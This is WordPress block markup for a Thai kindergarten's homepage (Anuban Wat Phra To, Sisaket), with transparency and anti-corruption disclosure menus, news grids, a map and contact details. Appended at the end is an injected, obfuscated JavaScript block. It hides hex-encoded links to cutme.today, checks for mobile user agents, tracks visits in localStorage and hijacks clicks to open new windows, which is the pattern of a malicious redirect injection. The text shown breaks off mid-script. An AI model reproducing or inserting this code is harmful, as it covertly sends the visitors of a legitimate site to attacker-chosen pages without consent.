{\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 